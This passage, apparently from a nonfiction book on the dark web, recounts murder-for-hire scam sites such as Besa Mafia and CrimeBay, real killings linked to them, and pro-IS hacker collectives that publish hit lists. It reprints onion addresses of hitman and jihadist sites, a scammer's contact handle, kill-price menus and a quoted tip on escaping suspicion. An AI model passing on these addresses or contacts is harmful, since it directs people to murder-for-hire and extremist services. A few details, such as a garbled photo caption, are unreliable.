Despite the presence of scammers and con artists, the world of assassins for
hire on the Dark Web is still very sinister. Material goods like drugs or rare
animals aren’t the only things that people buy on the untraceable Dark Web.
Ever so often, news comes of someone who’s attempted to use the Dark Web
for another purpose: murder. Undoubtedly, most hitman services are scams
designed to rob people of their bitcoins. Scams are simply easier, less
dangerous, and a more profitable model for marketplace owners. A
conversation at most hitman sites follows an identical template customer
submits the details of the person they wanted to be killed and the method they
prefer—a hit to look like an accident is always more expensive. Customers
pay upfront with bitcoin, which the website admin assures is refundable if the
hit doesn’t happen. The admin promises swift action but what follows are
excuses and stonewalling—the hitman had been stopped for a traffic
violation, or for illegal possession of a gun. The admin then claims a more
professional assassin could be hired, but that would cost more bitcoin. Some
customers keep paying, led on for months until the admin thinks they can’t
extract any more money from the customer.
Russia's Top Female Anti-Corruption Detective Shot Dead in
the Street
However, some assassinations do originate on the Dark Web. Take the case
of police investigator Lt Col Evgeniya Shishkina who was shot dead outside
her home near Moscow on October 10, 2018. She had been working for the
interior ministry investigating drug trafficking and fraud.
The murder scene of police investigator Lt. Col. Evgeniya Shishkina in Krasnogorskiy, Bayonetta.

On March 7, 2019, federal investigators in St. Petersburg announced the

detention of two suspects in Shishkina’s case. According to an official
statement, the man who carried out the killing is Abdulaziz Abdulazizov, a
19-year-old medical student. The second man is a 17-year-old high-school
student. The minor’s name has not been, but his initials are “A.G.”
According to the police reports, the order was placed by the owner of a drug-
dealing store on an illegal online platform called Hydra on the Dark Web.
Shishkina’s murder is thought to be one of the first cases of a hit ordered on
the Dark Web. The suspect “A.G.” accessed the Dark Web site Hydra in
August 2018, writing in a forum that he was looking for a job.
“A.G.” got a response the following month on the messaging app Telegram
from an individual who owns a store that trades on Hydra, outlined the details
of the contract killing. “A.G.” was paid 1 million rubles ($15,215) to arrange
the murder of Interior Ministry detective Evgeniya Shishkina. The police
documents say the 17-year-old split the 1 million rubles he was offered,
allegedly keeping 400,000 for himself and giving 600,000 to Abdulazizov to
carry out the murder.
With its origins in Russia’s hacking underworld, Hydra has emerged to
become the largest online drug bazaar on the planet. But it is also a Dark
Web drug enterprise like no other.
 Hydra homepage (http://hydrarusigitbkpn.onion)

Hydra has a whopping 2.5 million registered accounts and 400,000 regular
customers. The largest Western Dark Web market, AlphaBay, was thought to
have 400,000 registered users at its peak. While in other markets vendors pay
once to open an account, on Hydra every one of its estimated 5,000 shops has
to pay a monthly rent. This starts at $100 a month and rises to $1,000 a
month for an enhanced account, known as a Trusted Seller, whose ads appear
on the top banner. Trusted Sellers must have racked up at least 1,000
transactions and customer disputes should not exceed seven percent of the
total number of orders per month.
Between 2016 and 2019, Hydra’s 5,000 shops paid an estimated $1 billion to
the platform through sales commission, enhanced shop profiles, and shop
rents. This dwarfs its Dark Web counterparts in the West.
Hydra's admins have learned from previous dark web drug markets and know
that trust is key, so the marketplace has a sophisticated quality assurance set
up. Hydra has its own team of chemists and human guinea pigs to test each
product and medics on standby to give safety advice. There is a subforum
where these test results are posted, complete with graphs, analysis, and
photos. If the gear’s not up to scratch, the administration hands out penalties.
Anyone trying to pass oregano as high-grade chronic will get kicked off the
site. No fentanyl is allowed, and neither are weapons, hitmen, viruses, or
porn, although drugs, fake passports, dodgy SIM cards, and counterfeit cash
are sold.
On the whole, these rules appear to be obeyed, although the murder of Lt.
Col. Shishkina’s is certainly an exception.
The Besa Mafia Con Artist
Besa Mafia is a site Dark Web ostensibly run by Albanian gangsters (“besa”
is Albanian for “honor”). In reality, it is run by a con artist who calls himself
Yura. “We have a large network around the globe,” Yura boasts. “When you
order one of our services, we will contact one of our mob member close to
the victim he will provide the services to you locally. Whether you need
killing beating, killing, to scare someone, burn house or car, gets guns or
poison we can help you.”

http://zsyvom262oiaoc6es7bgg66xieyil6nqkh7jn5ntraghpqgudbcl3vad.onion
Besa Mafia lists these services on their website:
Killing, we have hitmen who are willing to do the killings starting
from $5000-100,000 depends on the personality and the method you
want.
Beating, we can beat up anybody you want starting from $2500-
10,000.
Setting cars and homes on fire starting from $2500-5000.
Purchasing Guns and poison we can provide weapon and poison its
depends on what you want.”
To order, Yura invites customers to contact him via secure email (Yura’s is
[email protected]) or wickr (Yura’s is hitman4hire).

Yura devoted a lot of energy defending the website’s credibility. A

California-based person going by name “Thcjohn2” had written to the
website offering his services as an assassin. “I am broke (of course), and am
looking for quick cash,” Thcjohn2 wrote. “I have military training (US
Navy).” Instead of taking him up on his offer, Yura had asked Thcjohn2 to
make videos of burning cars to boost the site's reputation. Yura also asked
Thcjohn2 to make fake murder videos. Soon, videos of thugs firing guns and
talking up Yura’s hitman website started popping up online, like this one on
YouTube, for example:
https://www.youtube.com/watch?v=KILUsa4crzI
Yura had also set up a galaxy of micro-websites on the surface web, which
spread the word about Besa Mafia under the pretense of denunciating it. Yura
had hired freelance SEO experts, who had optimized the sites to ensure that
they appeared high in search results for “hitman for hire” and similar word
combinations. People looking for a hitman would come across Yura’s
websites condemning the immorality of Besa Mafia, then would promptly
head to the Besa Mafia website on the Dark Web. The marketing strategy
paid off—the site quickly became a very profitable operation with customers
paying top dollar to have people murdered.
But in late April 2016, a hacker known as bRspd hacked Besa Mafia and
posted sensitive information online. Data leaked in this breach contains user
accounts, user personal messages, “hit” orders, and a folder named “victims”
that contains additional documents within it, including a ZIP file which
contains photos of victims from the “hit” orders on the site. The original leak
post also contained 250 accounts with usernames, email addresses, and
passwords. The two CSV files from the leak are named orders.csv and
msg.csv that contain 38 “hit” orders and 2,682 personal messages to and from
site administrators.
The data dump also included emails between Yura and two arsonists, as well
as an exchange of emails between Yura and someone identifying themselves
as a Texas investigator, who was seeking details on a hit placed on a Texas
woman through the site. Yura supposedly handed over the details provided
by the person ordering the murder, stating that they were “willing to work
with the FBI” if needed.
A second, nearly identical attack occurred in June 2016. This set several
events in motion. First, Yura reassured his customers that the leak was not a
big deal. “We are not a scam. There are no bitcoin lost. Our website got
hacked, but hackers only got information about some users,” Yura wrote in a
message to a customer. “They did not stoled any bitcoin.” Some media
outlets also covered the leak. Meanwhile, Yura set about launching a new,
rebranded website called CrimeBay.

Using information from bRspd’s dump, hackers once again managed to hack
into the website, even obtained access to Yura’s Gmail. There, the hackers
snooped through his correspondence, and found emails in which Yura talked
about buying a much-needed English course, messages to freelancers about
advertising, and data on bitcoin payments. Combining this information with
the content of the two bRspd leaks, the hackers obtained the cryptographic
keys controlling access to Besa Mafia’s website domain. The hackers copied
all of Besa Mafia’s content, and saved it in order to give it to the police—and
shut the website down, redirecting users to a site they had built. The new
page showed the picture of a closed, rusty door.

Besa Mafia's website as it appeared after "Operation Vegetable"

After the Besa Mafia fiasco, Yura launched CrimeBay, this time claiming to
be part of the Chechen Mob. He added a new service: “For important people,
like small celebrities, who have bodyguards, we offer you professional ex-
military operatives starting at $30,000 USD. They use a sniper rifle to do the
job and can escape discretely.” CrimeBay used the same source code as Besa
Mafia, which conveniently allowed hackers to continue to read the site’s
correspondence.
 Yura’s rebranded murder-for-hire- site CrimeBay

Today, Besa Mafia is back. On the homepage, Yura proudly announces “WE
ARE BACK AGAIN AND MORE SECURED” in large text.
Yura learned that the hackers gained access by ordering and communicating
directly through the Besa Mafia website. Consequently, Yura now has new
instructions for customers: “And also you user don’t create account on our
site anymore. You place order and give us your secure mail or wickr all
discussion takes place off the site to keep you safe away from the FBI never
use your name on this site place order and how you will be contacted use
secure mails like proton mail, secmail or wickr for instant messaging when
placing order for security reason.”
He also has a warning to potential hackers: “BE WARNED DON’T TRY
HACKING THIS SITE OR RISK YOU LIFE.”
An interesting outcome of the leaked data when the Besa Mafia website was
hacked is that the messages revealed a “kill list” of people who other people
wanted to kill. It’s apparent that the clients who are trying to hire hitmen on
the Dark Web are the truly dangerous people, more so than the scammers like
Yura who operate fake hitmen sites. The clients who want to hire an assassin
to murder someone they know, they are the real bad guys here. Yura had no
hitmen to deploy, but it turns out some of Besa Mafia’s customers decided to
take matters into their own hands, eventually killing their target themselves.
The website attracted customers from every corner of the world. There were
some trolls who put in joke requests, but most users were serious. Someone
wanted his wife’s lover killed, his organs sold to get a discount on the hit, and
the woman herself smuggled into Saudi Arabia; a Dutch user paid 20 bitcoin
to have someone flattened in a fake cycling accident; a person in Minnesota
had spent four months chatting with Yura about how to get a woman he knew
murdered.
Hackers provided the police with a document that included a breakdown of
the various hacks and dumps the Besa Mafia had suffered, and even a top 10
list of the website’s most dangerous users.
One of the “most wanted” users was someone who went by the name of
Dogdaygod. Dogdaygod first messaged Yura in February 2016. He was eager
to kill a woman living in Cottage Grove, Minnesota. Initially, Dogdaygod
suggested the method of assassination be a hit-and-run, or a deliberate traffic
collision, but later suggested more a rational method, such as shooting the
target and burning her house down.
Dogdaygod displayed a virulent animosity towards his target. “I need this
bitch dead, so please help me,” he wrote. Yura had egged him on: “Yes she is
really a bitch and she deserve to die.” The conversation went on for months,
coming to an abrupt conclusion when Dogdaygod—tired of Yura’s
increasingly implausible excuses for why the hit had not been carried out—
requested a refund.
“Unfortunately, this site has been hacked,” Yura responded. He pretended to
be the hacker, hoping to stop Dogdaygod from bothering him, even extracting
more money from Dogdaygod: “We got all customer and target information
and we will send it to law enforcement unless you send 10 bitcoin,” Yura
wrote, pretending to be a someone who hacked into the site. That happened
on May 20, 2016; Dogdaygod sent 10 bitcoins. It is good business to run a
fake hitman site, scamming criminals.
On May 31, 2016, about a month after the bRspd leak, the FBI contacted
Amy Allwine, a woman living at the Minnesota address Dogdaygod had
submitted to Besa Mafia. Amy and her husband Stephen Allwine—an IT
specialist and a deacon at a local church—met with officers who informed
them that someone had paid at least $6,000 on the dark web to murder Amy.
The Allwines said they had no idea of who could be hiding behind the
Dogdaygod persona.
Six months later, Amy Allwine was dead. On November 13, her husband
called 911 and said he had found her body in her bedroom. “I think my wife
shot herself,” he told the operator.

Amy was murdered on November, 13 2016 by her husband, aka Dogdaygod

However, the police found evidence that linked Stephen Allwine to the
murder: traces of bitcoin transactions on his devices, cookies for dark web-
related websites, the fact that Dogdaygod had tried to buy the anesthetic
scopolamine on the darknet—and that high doses of the substance had been
found in Amy’s system.
In January 2017 Allwine—aka Dogdaygod—was charged with his wife’s
murder. Stephen Allwine’s motive for murdering his wife was that he wanted
out of marriage, but the strict fundamentalist religion he was active with
would expel him if he filed for divorce. Stephen was a lay preacher at the
United Church of God and that role seemed to be the most important thing in
his life, even though he secretly breached the church’s rules by having
extramarital affairs and was willing to kill to keep up appearances. In court,
prosecutors pointed to a series of affairs—and the fact that Stephen was the
only beneficiary of Amy’s $700,000 life insurance policy—as probable
motives. In February 2018, Allwine was found guilty and sentenced to life in
prison.

Eventually, the UK National Crime Agency (NCA) launched an international

operation to look into the “kill list” hackers retrieved from the Besa Mafia
and Crime ay websites. They tracked down several Besa Mafia clients and
charged them with conspiracy to commit a crime. In March 2017, the NCA
arrested David Crichton, a British doctor who had ordered a hit on his former
financial advisor. Crichton did not pay the website, though, and later said he
had put in the order just out of frustration; Crichton was cleared of any
wrongdoing in July 2018. Another user in Denmark, an Italian-born woman
named Emanuela Consortini, was arrested thanks to an NCA tip-off and then
sentenced to six years in jail for commissioning the murder of an ex-
boyfriend.
CrimeBay was eventually shut down by the NCA and the Bulgarian police in
May 2017, but not before Yura stepped up his marketing with an attempt to
extort money by crowdfunding a hit on the new President: “Donald Trump is
an extremely difficult target”, the site acknowledges, “however, he is neither
a God nor immortal, and CrimeBay enjoys a challenge.”

Sinaloa Cartel Hitmen

The Sinaloa Cartel is an international drug trafficking, money laundering, and
organized crime syndicate established during the late 1980s with operations
in the Mexican states of Baja California, Durango, Sonora, and Chihuahua.
Many consider the Sinaloa Cartel the most powerful drug trafficking
organization in the world. It is certainly Mexico's most powerful organized
crime group.
The “Sinaloa Cartel Marketplace” (http://sinaloajbzogpkeu.onion) on the
Dark Web is not associated with the Sinaloa Cartel, despite its claim: “Under
the shelter and protection of the Deep Web, our hundreds of Sinaloa Cartel
members offer you high-quality drugs, guns, and professional assault services
at affordable costs.”
But the site seems active with plenty of clients forking over plenty of bitcoins
seeking to hire an assassin.

http://sinaloajbzogpkeu.onion

The Black Mob

The Black Mob is another hitman-for-hire service that appears to be
flourishing on the Dark Web. Claims to be an underground organization of
ex-military corps, ex-special forces, and trained assassins sponsored by the
Chechen Mob, with operatives in more than 43 countries.
Our agents are masked, and execute an order perfectly, leaving no
mistakes, traces or prints.

http://blkmobbzqjhpn232.onion

The services are extensive, at what are probably the most expensive fees of
any hitman-for hire site on the Dark Web:
Snipper kill ($35000 - $55000); Up-close Knife kill ($20,000 - $35,000);
Suicide with a noose ($20,000 - $35,000); Kidnapping ($70,000 - $250,000);
Personal bio/social life attack ($10,000 - $50,000); Personal Financial
destabilization ($30,000 - $70,000); Family Financial destabilization
($100,000 - $200000); Torture ($20,000 - $30,000); Set victims car on fire
($20,000 - $50,000); Set victims house on fire ($20000 - $50000).
One wouldn’t have to scam too many people a year to make a good living at
those prices! The site has been up since 2016, so maybe these guys are truly
making a killing.
Dark Mambia
“DarkMamba is a independent Private Military Company formed by ex-
military corps and ex-special forces. We operate worlwide.”
 http://darkmambawopntdk.onion

Mara Salvatrucha
“If you are a weak human and you are not able to kill or beat up your hated
man you can ask us to do it instead. We really can.”

http://marak2vqaeup4ibj.onion
Criminal Network
“Ordinary prices start from $4,000 depends on killer skills. It is a low price
but a lot of gang members do not live they exist and they are ready to kill for
this money. This service has one condition. Your victim has to be a common
human with no gun no bodyguard and no defense training.”
 http://los7jx7o6fgzw7os.onion

Assassination NETWORK
Unquestionably, Assassination NETWORK has the most snazzy looking
murder-for-hire site on the Dark Web. In fact, it could win an award for the
best designed website on the entire Dark Web. Instead of gruesome fake
photos you see on other hitman sites, there is a slick slide show on its
homepage. There is no hype or desperate attempts to try to convince potential
clients that they’re legitimate. And not only is the site free of horrendous
spelling and grammar errors found on every other hitman site does, but the
text is actually intelligent and convincing. The site has links to media stories
of mysterious and unsolved murders, which it claims were carried out by
their network of assassins—effective marketing.
http://assassinuyy7h425.onion
Murder Incorporated Hitmen
“Why use a paid killer? Because it is affordable, safe and allows you to get
away with murder. Make sure you are in a public place surrounded by people
and friends when the murder is done, and no one will suspect you.”
 http://hitmanalfc6c75hj.onion

Final Word
The evidence strongly suggests that hitman sites are scams, but people who
want somebody dead aren’t listening. One thing is for sure: they have become
catch points for real people who are searching to pay to have somebody
killed. And several men and women are sitting in prison after paying to one
of these sites—and getting caught by law enforcement.
Hitmen sites are simply a fantastic opportunity to defraud people. What are
you going to do if they don’t go through with it? Call the cops and report the
site for fraud? Hardly.
 15
GOING DARK: TERRORISM ON THE DARK WEB
As I was researching The Secret Story of 9/11 (2019), it became evident that
terrorist organizations had become very good at using end-to-end encrypted
technology such as the Telegram and Protonmail to thwart surveillance by
Western intelligence agencies, especially since the capture of Osama bin
Laden on May 2, 2011. There is apparent and clear evidence of terrorists
(like other criminals) utilizing the Dark Web using the Bitcoin to transfer
funds and make financial transactions. Today, the Dark Web is being used by
terrorist organizations to recruit and radicalize, raise funds, and hide their
communications and propaganda. This is especially true following the Paris
attacks on November 13, 2015, after which there was a massive takedown of
terrorist accounts on Telegram, Facebook, and Twitter, although terrorists are
certainly still active on all these platforms.
In the decade following 9/11, jihadist “safe havens” meant physical locations
in Afghanistan, northwest Pakistan, Yemen, and so on. But in the past
decade, terrorists have moved to “virtual safe havens”—encrypted
communications accounts, cryptocurrency accounts not registered with any
bank, and the Dark Web. Terrorists and extremists utilize the Dark Web to
mask their communications and propaganda efforts, to recruit and radicalize,
and to gain material benefits such as illicit goods, including, but not limited
to, weapons and fraudulent documents.
Better monitoring of the surface internet by social media companies and
security agencies has resulted in quick removal of extremist accounts and
content from social media platforms. Much of this material quickly
resurfaced on the Dark Web. Correlated to this is an increased use by terrorist
organizations of the Dark Web as a jihadist save haven for planning attacks.
Evidence suggests that terrorists use the Dark Web to plan and launch attacks
because detection by law enforcement is less likely. While initial contact can
be made on social media platforms like Facebook and Twitter, further
instructions are often given on end-to-end-encryption apps like Telegram on
how to access jihadist websites on the Dark Web for further interaction and
indoctrination. Given that the use of the Dark Web by terrorists is a relatively
young and growing area of interest, the trend to use the Dark Web is likely to
worsen in the future.
United Cyber Caliphate
Experts have predicted that victory on the physical battlefield would not be
enough to defeat the ISIS, and that—in response to its defeat in Iraq and
Syria—the organization would likely turn to a virtual safe haven (a “virtual
caliphate”) from which it would continue to coordinate and encourage
external attacks while building a foundation of support until it will be able to
restore its physical territory. This virtual caliphate has been defined as a
“ghost caliphate” that will allow the ISIS to rise after a physical defeat and
act as a cyber-warfare force. In recent years, that is precisely what has
happened.
The Islamic State is not the first to establish a ghost caliphate. There are those
who claim that al-Qaeda was the first guerrilla movement in history to
migrate from the physical sphere to cyberspace. For al-Qaeda, the internet
has become not only a virtual shelter where every dimension of global jihad
is taking place online, but also has created an online jihad university and
expanded the potential audience and methods of interaction. The internet
constitutes a transition to a functional tool for empowering the media,
promoting ideology, recruiting, funding, and training activists. For al-Qaeda,
cyberspace serves as its central nervous system.
A virtual jihadist community comprised of several pro-IS hacktivist groups—
thrives on the internet today. But what few understand is how these groups
have united into an umbrella organization or collective called the United
Cyber Caliphate (UCC).
The first pro-IS group is the “Cyber Caliphate Army,” and it arose
immediately with the Islamic State’s declaration of the establishment of the
Caliphate in the summer of 2014. The group claimed responsibility for the
takeover of Newsweek’s and CENTCOM’s Twitter accounts, and for
additional attacks that have garnered widespread publicity. On January 6,
2015, the group launched cyber-attacks against several American targets,
including the city of Albuquerque, New Mexico, WBOC News, and more.
The group was led by Junaid Hussain (aka Abu Hussain al-Britani), who was
born in 1994 and fled Britain to join the IS in 2013 after serving a prison
sentence for hacking the email account of former British Prime Minister,
Tony Blair. From his residence at an IS base in Raqqah, Syria, al-Britani
recruited hackers and nurtured the cyber caliphate that he envisioned until his
assassination in an American drone strike in August 2015 in Raqqah, Syria.
During the al-Britani era, cyber-attacks were not as sophisticated as one
would have expected from a Western leader, apparently due to al-Britani’s
inability to provide the IS cyber community with a network of other hackers.
The attacks included obtaining unclassified official documents and sensitive
information from law enforcement agencies. The information may have been
stolen from email correspondence, and not necessarily through hacking, but
the group demonstrated at least a basic level of hacking ability.
After al-Britani’s death, Siful Haque Sujan, a businessman of Bangladeshi
origin and a computer expert who studied and was educated in Britain,
became the leader of the group. He was also killed in a targeted drone strike
in Raqqah on December 10, 2015. Al-Britani’s wife, Sally Jones (aka Umm
Hussain Britaniya) continued his legacy and became known for her
prominent presence on social networks as a recruiter and propagandist for the
IS; Jones was declared a terrorist by the UN and was apparently killed in a
US drone strike, although the report could not be verified.

Screenshot from Twitter

A second pro-IS hacktivist group is the “Islamic State Hacking Division” that
arose in early 2015 and seems to be loosely connected to the Cyber Caliphate
Army on the basis of al-Britani’s leadership. On October 25, 2015, federal
prosecutors revealed a 20 criminal case in which Ardit Ferizi, a Kosovo
citizen known as Th3Dir3ctorY and considered the leader of a hacking
collective called Kosova Hackers Security, was accused (October 6, 2015) of
providing material support to the IS, computer hacking and identity theft
violations as a result of the theft and distribution of Personally Identifiable
Information of US service personnel and federal government employees. The
Assistant District Attorney in the case said the incident represents the first
time that national cybersecurity has faced a real threat from the combination
of terrorism and hacking. Ferizi pleaded guilty on June 15, 2016, and was
sentenced to 20 years in prison; he admitted that he had obtained
administrator privileges for the hosting server of a US company site. The
database of the company included the personal information of tens of
thousands of the company's clients, including military and government
personnel, 1,300 of which Ferizi transferred to al-Britani, who in turn
published it as a killing list by sharing a "tweet" on Twitter from an account
called the Islamic State Hacking Division (ISHD). The following was written
in the document containing the list:
“We are in your emails and computer systems, watching and
recording your every move, we have your names and addresses, we
are in your emails and social media accounts, we are extracting
confidential data and passing on your personal information to the
soldiers of the khilafah, who soon with the permission of Allah will
strike at your necks in your own lands!”
The fact that al-Britani once again shared a tweet from the Islamic State
Hacking Division Twitter account means that there is at least a connection
between the two groups, the Cyber Caliphate Army and the Islamic State
Hacking Division, and perhaps even partial or full overlap of activists under
both organizational names. If there is dual activity by the same players, then
there is meaning behind the groups’ name selection. Thus, the name of the
first group (Cyber Caliphate Army) reflects advanced conceptual thinking
based on a vision for the establishment of a cyber caliphate, while the name
of the second group (Islamic State Hacking Division) reflects the unique
purpose of a division that works for the benefit of the IS in cyberspace. The
distinction is significant because the hacking division (Islamic State Hacking
Division) is a functional tool designed to serve the IS unlike the Cyber
Caliphate Army, which is an end in and of itself—the establishment of a
caliphate in cyberspace and its subordination to Shari'a as interpreted by the
IS.
The first official statement by a third pro-IS hacktivist group calling itself the
“Islamic Cyber Army” was first published on September 10, 2015, on
Twitter, calling on hackers to join a campaign against the Americans and
their supporters, and to support the Islamic State. The statement reads:
The hackers Supporters of the Mujahideen configure under the
banner of unification in the name of Islamic Cypher Army to be God
willing, working front against the Americans and their followers to
support the ISLAMIC STATE Caliphate with all their forces in the
field of e-jihad.

Near the anniversary of the 9/11 attacks, the group launched a propaganda
campaign posting on Twitter under the #AmericaUnderAttack and
#IslamicCyberArmy hashtags, under which threats were made regarding a
cyber-attack and a count-down to a zero hour, along with lists of email
addresses of 300 FBI agents and what appeared to be a leaking of passwords
into their accounts. Later on, it became clear that the list was taken from a list
stolen by the LulzSec hacker group and was not the result of the Islamic
Cyber Army group's hacking capabilities.
In addition, the group distributed a 10:31-minute video detailing its members,
making threats against the United States, and displayed screenshots of sites
that the group allegedly corrupted, including the site of the Azeri Amraha
Bank and the Iraqi Ministry of National Infrastructures. The video also
claimed that the organization had obtained personal information of White
House employees.
 Presentation of Islamic Cyber Army members (screenshot from video)
The detailing of the group members also included HaCker AldMar who in
September 2015 posted on Twitter a threat to attack US banks and
government sites on September 11, 2015. In response, the FBI issued a report
in which it identified HaCker AldMar as a member of the ICA group, and the
threat defined by the FBI was harm to government, banking, and military
related networks. The ICA group is ranked in the report as having
unsophisticated attack capabilities, whose members will seek to exploit
opportunities based on technical weaknesses rather than high-level offensive
capabilities.
“Rabitat Al-Ansar” is a fourth group that is part of a wider pro-IS hackers'
collective called Media Front, which includes, amongst others, Al-Ghurab,
Al-Wafa, Al-Minhaj. In this framework, the group operated first as a unit for
the dissemination of jihadist propaganda for the IS, and with the expansion of
the community of supporters who carry out hacking operations under the
name IS, Rabitat Al-Ansar also began claiming responsibility for the hacking
operations.25 In March 2015, the group announced that it intends to launch
an anti-American terror campaign under the hashtag #WeWeillBurnUSAgain.
The campaign included the distribution of propaganda supporting the IS in
English, including videos showing operational activity against US forces in
Iraq, the decapitation of US citizens, and messages from bin Laden and other
prominent al-Qaeda leaders directed at the United States. In April, the group
issued a statement claiming responsibility for the theft of personal
information of 2,000 people, most of them Americans, and others Canadian,
Norwegian and Australian citizens, and even released a sample of 400 of
them to prove the reliability of the information, but it was not clear whether
the information was stolen through hacking or whether it was gathered from
open sources online.26 In response, the FBI investigated the threat and
published a report that concluded that the cyber-attacks the group took
responsibility for were actually old attacks that had already been solved.
According to the report, if the group carries out a hacking, it is assumed that
this is the exploitation of a known weakness based on a technical opportunity
rather than a high capability.
In May 2015, the group released a video called Message to America: From
the Earth to the Digital World. In the video, the group declares that its
members are the hackers of the Islamic State, and the group is committed to
electronic warfare against the United States and Europe, and even threatens
that the information security of the West is in its hands, while clarifying that
the group will soon dominate the electronic world of the West. In the video,
the group boasts of vandalism attacks "signed" by the Cyber Caliphate Army
group, indicating an interplay between the pro-IS hacker groups. In addition
to the repetitiveness of the matter of control over the digital world, the video
prominently refers to the economic aspect. The group notes in the video that
"despite the multi-billion-dollar investment to protect the electronic sites—it
has become easier to hack your sites [the US and Europe].”
The two groups—Islamic Cyber Army and Rabitat al-Ansar—focus mainly
on the United States, as evidenced by the publication of propaganda videos
explicitly a dressing Americans, by the proclamation of campaigns against
the United States, the use of the hashtags to disseminate propaganda making
explicit threats against the United States, and by setting the anniversary of the
attacks on the World Trade Center for the launching of expansive campaigns.
The entity HaCker AldMar was finally identified as Uthman Zein al-Naiyf, a
Kuwaiti citizen arrested for disseminating pro-IS content on the internet. By
virtue of his association sometimes as a subgroup of Rabitat al-Ansar and
sometimes as an individual member of the Islamic Cyber Army group, it is
possible to infer the flexibility and liquidity of the groups' array. At the very
least, the groups are connected to each other and another reasonable
possibility is that these are groups that share member/s or that this is a single
group with dual branding.
Mention of the subgroup “Sons Caliphate Army” was first observed in
January 2016 in the CCA's publication of a video titled “Flames of Ansar,”
which claimed responsibility for the hacking of 15,000 Facebook and
Twitter accounts (10,000 Facebook accounts, 150 Facebook groups, 5,000
Twitter accounts), and threatening the lives of the companies' founders, Mark
Zuckerberg and Jack Dorsey, if they do not stop removing accounts
associated with ISIS from their systems. At the very least, the publication
attests to a close connection between these two groups; Similar to Islamic
State Hacking Division, here too the group's source is associated with the
Cyber Caliphate Army.
In April 2016, the pro-IS hacker groups merged to an umbrella organization
called “United Cyber Caliphate.” The groups operate in cyberspace as the
“electronic army” of the caliphate. The union was first published on the
Cyber Caliphate Army Telegram channel and announced a union of the
groups: Ghost Caliphate Section, Sons of Caliphate Army, Kalachnikov E-
Security, Cyber Caliphate Army. Of the four groups presented in the union,
two ere known as IS supporters, the Cyber Caliphate Army and the Sons
Caliphate Army. The two new groups were Kalachnikov E-Security Team
and Ghost Caliphate Section.
United Cyber Caliphate formed in April 2016 included Ghost Caliphate Section, Sons of Caliphate
Army, Kalachnikov E-Security, Cyber Caliphate Army.

The United Cyber Caliphate claimed responsibility for leaking information

from the date of the declaration of union (April 5, 2016), and the publication
of such information was usually accompanied by a call to carry out "lone
wolf" attacks on the listed targets. The UCC also corrupted sites as part of the
#KillCrusaders campaign, from which the United States, Chile, China,
France, Malaysia, and Mexico were affected. On April 18, 2016, the
organization launched the #Gaza_Reloaded campaign, where members of the
organization leaked personal information of the accounts of 10,000 people. A
few days later on April 21, 2016, the United Cyber Caliphate published a hit
list of New York residents together with a banner stating that they want these
people dead. Later on April 24, 2016, the United Cyber Caliphate published a
list of US State Department employees who are also wanted dead.
The first official campaign of the new united organization under the new
leadership of the Osed Agha was launched in December 2016 under the name
“#Op_Gaz_Chamber,” and it emphasizes the continuation of its activity
against the "enemy targets" in the cyberspace while harshly criticizing the
Saudi regime for its cooperation with Western forces. The group reported on
its Telegram channel that it managed to break into Saudi servers and steal
personal data of soldiers, which it threatened to reveal. The group later issued
a statement calling for the assassination of the "Saudi group", in which a $
5,000 reward was placed over each soldier. This refers to 55 Saudi security
personnel whose identity was exposed through a series of photographs
following the statement.

Left: an invitation to carry out a hit; On the center and right: two photos from the hit list (source:
Telegram)

A second official United Cyber Caliphate campaign was launched in January

2017 under the name "#Demolishing_Fences", characterized by attacks on
private networks and support for lone wolf attacks. Later, in February,
another hit list of 4,000 names was found on the laptop of one of the IS
recruits from West India who was caught and arrested. The list included
personal details of professionals perceived as threatening the organization's
ideology. The list included computer specialists from around the world
employed in commercial companies such as Amazon, Intel, Exxon, BMW.
On March 16, 2017, the United Cyber Caliphate released a video in which it
announced the death of Osed Agha, the group's leader, in a US airstrike.
Agha is identified as being responsible for the distribution of hit lists. In
response to the elimination, the United Cyber Caliphate produced, at the end
of March 2017, a recruitment video according to which the group faces a new
stage in the struggle against "the countries of heresy" and electronic armies.
The campaign will focus on attacking private networks and supporting
physical attacks of “lone wolves.” The video opened with a tribute to Agha,
showing the group's achievements in the first campaign under the leadership
of Agha, which include, according to the United Cyber Caliphate, the
hacking of sites, some of them of Iraqi politicians, of hundreds of social
media user accounts and surveillance cameras. The group also claims that it
managed to crash six sites through a DDoS attack and distribute three hit
lists. Later in the video, the new leadership is presented with three branches
— Cyber Kahilafah, Kalashnikov Team, and Sons of Caliphate Army. The
new structure includes four divisions: Ghost Section, Katibat al-Khansaa,
Liwa al-Guraba, and UCC Media Front. At the end of the video, the group
calls for the recruitment of additional hacker groups to its ranks.

Screenshots from the tribute video to Agha showing the United Cyber Caliphate organizational
structure

In April 2017 an additional hit list of 8,786 people was distributed. The list
was distributed in an Excel file using closed Telegram channels and
accompanied by a video for verification. The video opens with a threat to the
American people and President Trump. A written statement is issued stating
that the IS will continue to attack the American people and that the UCC will
begin a new phase in the war, called Demolishing Fences. A message is then
displayed announcing the distribution of a list of more than 8,000 people with
their names, addresses, and email addresses, and the viewers are asked to kill
them wherever they may be. In the next scene, an execution is documented
using the IS modus operandi, along with a presentation of the first 200 names
on the list.
A screenshot of the hit list and the Telegram group in which it was published.

On June 23, 2017, Cyber Kahilafah established a Telegram channel and

announced the establishment of the group's website on the Dark Web:
http://jihad7malo6oabuj.onion
On April 11, 2017, the United Cyber Caliphate has two other hacker groups
join its ranks, Anon Terror, led by Shadow Caliphate, and Fighter Moeslim
Cyber Caliphate, led by Xo2ar CyberSPhreak. After the announcement, a
wave of vandalism attacks was launched against many sites on which the
hackers left their mark and group affiliation. This is the accepted practice of
joining the organization, and on some sites a message was left saying that the
site will be monitored.

Left and center: websites that were defaced in the wave of cyber-attacks; Right: The announcement
from the United Cyber Caliphate Telegram channel.

On May 25, 2017, the Fighter Moeslim Cyber Caliphate posted on its
Telegram channel that it was looking for another Muslim hacker to join its
ranks to attack the infidels. The post was accompanied by an encrypted email
address (Protonmail) for contacting the group leader anonymously.
 A post to recruit a Muslim hacker by Fighter Moeslim Cyber Caliphate

Interestingly, in April 2017, the Mujahidin Cyber Army hacker group, of

Indonesian origin, identified with al-Qaeda, ridiculed the Fighter Moeslim
